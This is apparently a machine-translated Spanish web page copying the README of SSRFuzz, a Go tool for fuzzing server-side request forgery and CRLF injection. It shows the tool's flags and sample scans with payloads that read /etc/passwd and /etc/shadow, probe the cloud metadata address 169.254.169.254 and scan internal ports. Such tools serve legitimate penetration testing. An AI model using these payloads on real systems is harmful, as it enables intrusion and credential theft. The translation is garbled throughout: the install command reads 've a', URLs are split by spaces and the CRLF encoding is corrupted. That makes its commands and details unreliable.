SSRFuzz es una aparejo para encontrar vulnerabilidades de falsificación de solicitudes del costado del servidor, con capacidades de encadenamiento CRLF.
¿Por qué?
- Quería escribir una aparejo en Golang para la concurrencia.
- Quería fuzz parámetros para vulnerabilidades SSRF, así como fuzz entreambos rutas y parámetros para inyecciones de CRLF
- Me inspiré en el trabajo de Orange para encadenar este tipo de vulnerabilidades (https://blog.orange.tw)
Instalación
Ejecute el subsiguiente comando para intsall
ve a -u github.com/ryandamour/ssrfuzz
Uso
Uso:
escaneo ssrfuzz [flags]
Banderas:
-b, –call-back string Ampliar devolución de indicación para fuzzing SSRF (es opinar: https://github.com/ropnop/serverless_toolkit/tree/master/ssrf_slack)
-c, –dependencia de cookies Cookie que se utilizará para las solicitudes
–Crlf-path Agrega cargas aperos CRLF a todas las rutas disponibles (es opinar: site.com/%0Atest.php)
–Delay int El tiempo que cada hilo aplazamiento entre solicitudes en milisegundos (predeterminado 100)
-d, –domains string Ubicación de los dominios con parámetros para escanear
-h, –ayuda de ayuda para escanear
-x, –http-method string Método HTTP – GET o POST (predeterminado «GET»)
-o, –dependencia de salida Ubicación para asegurar los resultados
–Skip-crlf Prescindir fuzzing CRLF
–Skip-network Prescindir fuzzing de red
–Saltar esquema Saltar esquema de fuzzing
-s, –slack-webhook string Slack webhook para despachar resultados a un canal
-t, –threads int Número de subprocesos para ejecutar ssrfuzz (predeterminado 50)
–Timeout int La cantidad de tiempo necesario para cerrar una conexión que podría colgarse (predeterminado 10)
-u, –user-agent string Agente de heredero para solicitudes (predeterminado “Mozilla / 5.0 (X11; Linux x86_64) AppleWebKit / 537.36 (KHTML, como Gecko) Chrome / 81.0.4044.138 Safari / 537.36”)
-v, –verbose verbose salida
Uso:
echo «http: // url_to_fuzz» | escaneo ssrfuzz
cat file_of_domains.txt | escaneo ssrfuzz
ssrfuzz scan -d file_of_domains.txt
* Escaneo de cargas aperos de esquema y http con crlf:
echo “http://192.168.1.10/test.php?u=” | ve a ejecutar main.go scan
[!] Coincidencia de carga útil del esquema:
* http: //192.168.1.10/test.php? u = archivo: // etc / passwd 200
[!] Se encontraron cargas aperos interesantes
* http: //192.168.1.10/test.php? u = http: //127.1.0.0: 80200
* http: //192.168.1.10/test.php? u = http: //127.1.0.0: 8080500
* http: //192.168.1.10/test.php? u = http: //127.1.0.0: 443500
* http: //192.168.1.10test.php? u = http: //127.1.0.0: 22 500
* http: //192.168.1.10/test.ph? u = http: //127.1.0.0: 25 500
* http: //192.168.1.10/test.php? u = http: //127.1.0.0: 445 500
[!] Se encontraron cargas aperos interesantes
* http: //192.168.1.10/test.php? u = http: //127.127.127.127: 80% 23% OA 200
* http: //192.168.1.10/test.php? u = http: //127.127.127.127: 80% 23% OA 200
* http: //192.168.1.10/test.php? u = http: //127.127.127.127: 8080% 23% OA 500
* http: //192.168.1.10/test.php? u = http: //127.127.127.127: 8080% 23% OA 500
* Escaneando solo cargas http con crlf:
echo “http://192.168.1.10/test.php?u=” | ve a ejecutar main.go scan –skip-schema
[!] Se encontraron cargas aperos interesantes
* http: //192.168.1.10/test.php? u = http: //127.127.127.127: 80% 23% OA 200
* http: //192.168.1.10/test.php? u = http: //127.127.127.127: 80% 23% OA 200
* http: //192.168.1.10/test.php? u = http: //127.127.127.127: 8080% 23% OA 500
* http: //192.168.1.10/test.php? u = http: //127.127.127.127: 8080% 23% OA 500
* http: //192.168.1.10/test.php? u = http: //127.127.127.127: 443% 23% OA 500
* http: //192.168.1.10/test.php? u = http: //127.127.127.127: 443% 23% OA 500
* http: //192.168.1.10/test.php? u = http: //127.127.127.127: 25% 23% OA 500
* http: //192.168.1.10/test.php? u = http: //127.127.127.127: 25% 23% OA 500
* http: //192.168.1.10/test.php? u = http: //127.127.127.127: 22% 23% OA 500
* http: //192.168.1.10/test.php? u = http: //127.127.127.127: 22% 23% OA 500
* http: //192.168.1.10/test.php? u = http: //127.127.127.127: 445% 23% OA 500
* http: //192.168.1.10/test.php? u = http: //127.127.127.127: 445% 23% OA 500
* Escaneando solo cargas http sin crlf:
echo “http://192.168.1.10/test.php?u=” | ve a ejecutar main.go scan –skip-schema –skip-crlf
[!] Se encontraron cargas aperos interesantes
* http: //192.168.1.10/test.php? u = http: //127.1.0.0: 80200
* http: //192.168.1.10/test.php? u = http: //127.1.0.0: 8080500
* http: //192.168.1.10/test.php? u = http: //127.1.0.0: 443500
* http: //192.168.1.10/test.php? u = http: //127.1.0.0: 22 500
* http: //192.168.1.10/test.php? u = http: //127.1.0.0: 25 500
* http: //192.168.1.10/test.php? u = http: //127.1.0.0: 445 500
* Escaneo solo de cargas aperos del esquema sin crlf:
echo “http://192.168.1.10/test.php?u=” | ve a ejecutar main.go scan –skip-network –skip-crlf
[!] Se encontraron cargas aperos interesantes
* http: //192.168.1.10/test.php? u = archivo: /// etc / passwd 200
* http: //192.168.1.10/test.php? u = archivo: /// etc / shadow 500
* http: //192.168.1.10/test.php? u = archivo: //169.254.169.254/ 500